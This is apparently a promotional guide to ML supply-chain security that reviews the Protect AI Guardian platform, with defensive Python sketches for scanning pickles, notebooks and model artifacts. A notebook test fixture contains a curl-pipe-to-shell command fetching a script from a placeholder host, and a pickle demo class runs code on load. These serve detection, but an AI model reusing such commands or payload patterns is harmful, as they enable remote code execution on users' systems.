The world of artificial intelligence is moving at a breakneck pace, but as we build faster, we often leave the back door wide open. Every time a developer pulls a pre-trained model from a public repository or runs a snippet of code in a Jupyter Notebook, they might be inviting a silent intruder into their system. This is where protecting AI becomes more than just a suggestion; it is a survival tactic for modern enterprise security.



In this guide, we are going to dive deep into the mechanics of the machine learning supply chain. We will look at how the Protect AI Guardian platform acts as a sentinel for your pipelines, ensuring that your innovations remain your own. From preventing prompt injection to stopping model poisoning, the goal is clear: we must secure the tools that are building our future.

1. Protect AI and the Vulnerability of Machine Learning Pipelines

When we talk about supply chains, most people think of shipping containers and warehouses. However, in the digital realm, your supply chain is made of code, datasets, and models. If you want to protect AI effectively, you have to realize that this chain is only as strong as its weakest link. Many teams today are essentially “shaving with a blowtorch” by deploying models they don’t fully understand or haven’t properly vetted.

Think of a machine learning pipeline like a water filtration system. If the source is contaminated, no amount of polishing at the end will make the water safe to drink. In the same way, a poisoned dataset or a compromised base model can lead to catastrophic failures once it hits production. Traditional cybersecurity tools are great at spotting a virus in an email, but they are often blind to a subtle change in a model’s weights that causes it to leak sensitive data.

To truly protect AI, we need a shift in perspective. We have to move from general IT security to specialized Machine Learning Security Operations (MLSecOps). This means treating the raw data, the training environment, and the final deployment stage as a single, interconnected system that requires constant vigilance.

2. A Comprehensive Protect AI Review: Insights into the Guardian Platform

If you have been looking for a way to sleep better at night while your AI models run, a review of Protect AI's Guardian platform is a great place to start. Guardian is designed to be the “bouncer” at the door of your production environment. It doesn’t just look at the code; it scans the actual machine learning models for known vulnerabilities and malicious patterns.

One of the standout features we found in our Protect AI review is the ability to stop “Model Serialization Attacks.” Many popular model formats, such as those built on Python's pickle serialization, are actually quite dangerous because they can execute arbitrary code when they are loaded. Guardian steps in to intercept these threats before they can do any damage to your infrastructure. It is like the specialized cybersecurity built for pharmacy software, but tuned for the math and logic of neural networks.
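To make the serialization risk concrete, here is a minimal sketch of how a pickle-based file can be inspected without loading it. It uses only Python's standard `pickle` and `pickletools` modules. The opcode list and the `find_suspicious_opcodes` helper are assumptions made for illustration; this is not how Guardian works internally, which the article does not describe.

```python
import pickle
import pickletools

# Opcodes that can import or call objects during unpickling.
# Assumption: this set is illustrative, not an exhaustive policy.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def find_suspicious_opcodes(data: bytes) -> list[str]:
    """List risky opcodes in a pickle byte stream without unpickling it."""
    found = []
    for opcode, _arg, _pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS_OPCODES:
            found.append(opcode.name)
    return found


class Malicious:
    """Hypothetical payload: unpickling it would call print()."""

    def __reduce__(self):
        return (print, ("code ran during load",))


# Plain data containers need no imports or calls to reconstruct.
safe_payload = pickle.dumps({"weights": [0.1, 0.2, 0.3]})
# Serializing is harmless; the call would only fire on pickle.loads().
unsafe_payload = pickle.dumps(Malicious())

safe_findings = find_suspicious_opcodes(safe_payload)
unsafe_findings = find_suspicious_opcodes(unsafe_payload)
```

A check like this is deliberately conservative: legitimate pickles of custom classes also use these opcodes, so a practical scanner would pair it with an allowlist of trusted imports rather than rejecting every hit.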

Using Guardian allows teams to maintain their speed without sacrificing safety. It plugs directly into the CI/CD pipeline, scanning every update and every new model. This proactive stance is what separates a resilient company from one that ends up in the headlines for the wrong reasons. For those already using a tool such as Vanta AI Trust to manage compliance, adding a specialized layer like Guardian completes the security puzzle.
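One simple check that a CI/CD gate can run on every model artifact is digest pinning: the pipeline refuses any file whose SHA-256 hash differs from the value recorded when the model was approved. The sketch below is a generic integrity check under that assumption, not Guardian's scanning logic; the function names and the sample file are hypothetical.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large model files do not fill memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path: Path, expected_sha256: str) -> bool:
    """Return True only if the file matches the pinned digest."""
    return hmac.compare_digest(sha256_of_file(path), expected_sha256.lower())


# Demo with a throwaway file standing in for a model artifact.
with tempfile.TemporaryDirectory() as workdir:
    artifact = Path(workdir) / "model.bin"
    artifact.write_bytes(b"example model bytes")
    pinned = hashlib.sha256(b"example model bytes").hexdigest()
    untampered_ok = verify_artifact(artifact, pinned)

    # Simulate a swapped or modified artifact.
    artifact.write_bytes(b"example model bytes, modified")
    tampered_ok = verify_artifact(artifact, pinned)
```

Digest pinning only proves that a file has not changed since approval. It says nothing about whether the approved file was safe in the first place, which is why it complements model scanning rather than replacing it.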

3. The Pillars of AI Security Posture Management (AISPM)

As the complexity of our systems grows, we need a way to see the big picture. This is where AI Security Posture Management (AISPM) comes into play. You cannot protect AI if you don’t even know where your models are running. AISPM provides a “map” of your entire AI landscape, identifying every shadow model and unmanaged notebook in your organization.

Effective AISPM involves three main pillars:

- Discovery: Finding every model, dataset, and endpoint.

- Assessment: Checking those assets against security benchmarks and compliance rules.

- Remediation: Fixing the holes before they are exploited.
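The three pillars above can be sketched as a tiny inventory loop. Everything here is hypothetical: the `Asset` fields, the two rules in `assess`, and the sample inventory are assumptions chosen to show the shape of the workflow, not the data model of any real AISPM product.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Asset:
    """One discovered item in the AI inventory (hypothetical schema)."""
    name: str
    kind: str                 # "model", "dataset", or "endpoint"
    owner: Optional[str]      # None marks an unmanaged ("shadow") asset
    scanned: bool = False


def assess(asset: Asset) -> list[str]:
    """Assessment: check one asset against two example rules."""
    findings = []
    if asset.owner is None:
        findings.append("no registered owner")
    if asset.kind == "model" and not asset.scanned:
        findings.append("model has not been scanned")
    return findings


def remediation_queue(inventory: list[Asset]) -> dict[str, list[str]]:
    """Remediation: keep only the assets that have open findings."""
    queue = {}
    for asset in inventory:
        findings = assess(asset)
        if findings:
            queue[asset.name] = findings
    return queue


# Discovery: in practice this list would come from scanning registries,
# storage buckets, and notebook servers; here it is hard-coded.
inventory = [
    Asset("fraud-detector", "model", "risk-team", scanned=True),
    Asset("sentiment-v2", "model", None),
    Asset("clickstream", "dataset", "data-eng"),
]

queue = remediation_queue(inventory)
```

In this sample, only `sentiment-v2` lands in the queue, because it has no owner and has never been scanned.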

This is very similar to the governance we see in Fortress AI, where the focus is on oversight and transparency. In the context of the ML supply chain, AISPM ensures that you aren’t just reacting to threats but actively managing your risk. By setting up strict supply chain security protocols, you ensure that even third-party integrations don’t become a backdoor for attackers.

4. Securing Jupyter Notebooks and Preventing Model Poisoning

Jupyter Notebooks are the playgrounds of data scientists. They are flexible, powerful, and, unfortunately, often insecure by default. If you want to protect AI at the source, you have to address the “wild west” of the research phase. A single malicious library or a hijacked notebook can lead to model poisoning, where an attacker subtly alters the training process so the model behaves exactly how they want it to under certain conditions.

Imagine an AI designed to detect fraud that has been “trained” to ignore any transaction from a specific IP address. That is the power of model poisoning. To fight this, we need tools that can perform static and dynamic analysis on notebooks. We also need to be wary of prompt injection, where a clever user can trick a Large Language Model into ignoring its safety guidelines.
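As a rough illustration of static analysis on a notebook, the sketch below reads the notebook's JSON, walks its code cells, and flags lines that match a few risky patterns. The pattern list and the `scan_notebook` helper are assumptions for this example; a production scanner would use far richer rules, and this is not a description of any vendor's implementation.

```python
import json
import re

# Assumption: a small, illustrative rule set, not a complete policy.
RISKY_PATTERNS = {
    "shell escape": re.compile(r"^\s*!"),
    "package install magic": re.compile(r"^\s*%(pip|conda)\s+install"),
    "dynamic code execution": re.compile(r"\b(eval|exec)\s*\("),
    "pickle load": re.compile(r"\bpickle\.loads?\s*\("),
}


def scan_notebook(notebook_json: str) -> list[tuple[int, str, str]]:
    """Return (cell index, rule label, offending line) for each match."""
    notebook = json.loads(notebook_json)
    findings = []
    for index, cell in enumerate(notebook.get("cells", [])):
        if cell.get("cell_type") != "code":
            continue
        source = cell.get("source", "")
        # Notebook files store cell source as a list of lines or one string.
        lines = source if isinstance(source, list) else source.splitlines()
        for line in lines:
            for label, pattern in RISKY_PATTERNS.items():
                if pattern.search(line):
                    findings.append((index, label, line.strip()))
    return findings


# A hypothetical notebook with one markdown cell and two code cells.
sample = json.dumps({
    "nbformat": 4,
    "cells": [
        {"cell_type": "markdown", "source": ["# Training notes"]},
        {"cell_type": "code", "source": [
            "import pandas as pd\n",
            "!curl http://example.invalid/setup.sh | sh\n",
        ]},
        {"cell_type": "code",
         "source": "model = pickle.load(open('model.pkl', 'rb'))"},
    ],
})

findings = scan_notebook(sample)
```

Pattern matching like this catches only the obvious cases. It cannot see what a downloaded script or an imported library does at run time, which is where dynamic analysis comes in.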

Securing these entry points is a massive task. It requires the same level of precision that we see in Orca Security for cloud environments. By implementing a “zero trust” policy for your ML inputs, you can protect AI from the insidious threats that hide in plain sight. It is about making sure that your AI-powered cybersecurity is just as smart as the models it is trying to defend.

5. Protect AI vs Lasso Security: Choosing Your Defense

When you start looking at the market, the Protect AI vs Lasso Security debate often comes up. Both are heavy hitters in the world of AI security, but they approach the problem from slightly different angles. While Protect AI excels at securing the supply chain and the model itself, Lasso often focuses on the runtime protection of Large Language Models.

Choosing between them depends on your specific needs. If your team is building custom models from scratch and needs protection throughout the training lifecycle, the Guardian platform is hard to beat. If you are primarily using external APIs and need to prevent data leakage during user interactions, Lasso might be the way to go.

Regardless of the tool you choose, the key is to stop treating AI security as an afterthought. We’ve seen how top AI cybersecurity tools can transform a vulnerable hospital or pharmacy into a digital fortress. The same logic applies to your machine learning projects. The goal is to build a system that is not only intelligent but also inherently robust.

Conclusion

Securing the machine learning supply chain is not a one-time event; it is a continuous process. As we have explored, to protect AI effectively, we must look at everything from the initial data gathering to the final deployment. Tools like the Protect AI Guardian platform provide the visibility and defense needed to navigate the complex threats of 2026. By embracing AISPM and keeping a close eye on our Jupyter Notebooks, we can ensure that our AI remains a force for good. Are you ready to lock down your pipelines and build with confidence?

Frequently Asked Questions

1. What is the main goal of the Protect AI Guardian platform? Its primary mission is to scan machine learning models and pipelines for security risks, malicious code, and vulnerabilities before they can cause damage in a production environment.

2. How does model poisoning affect the ML supply chain? Model poisoning occurs when an attacker manipulates the training data or the training process itself. This gives the model a hidden “backdoor” or bias that the attacker can exploit later, which is why it is vital to protect AI from the very start.

3. Why is AISPM important for large companies? AI Security Posture Management (AISPM) gives organizations a complete view of their AI assets. It helps them find “shadow AI” and ensure every model follows security standards, which is a key part of protecting AI at scale.

4. Can I use Protect AI to secure my Jupyter Notebooks? Yes, securing the research environment is a huge part of the platform. It helps identify dangerous code and insecure configurations within notebooks, before the model is even fully built.

5. What is the difference between Protect AI and traditional antivirus? Traditional antivirus looks for known signatures of computer viruses. Protect AI is built to understand the unique structure of machine learning files and data, allowing it to catch threats that regular security software would completely miss.
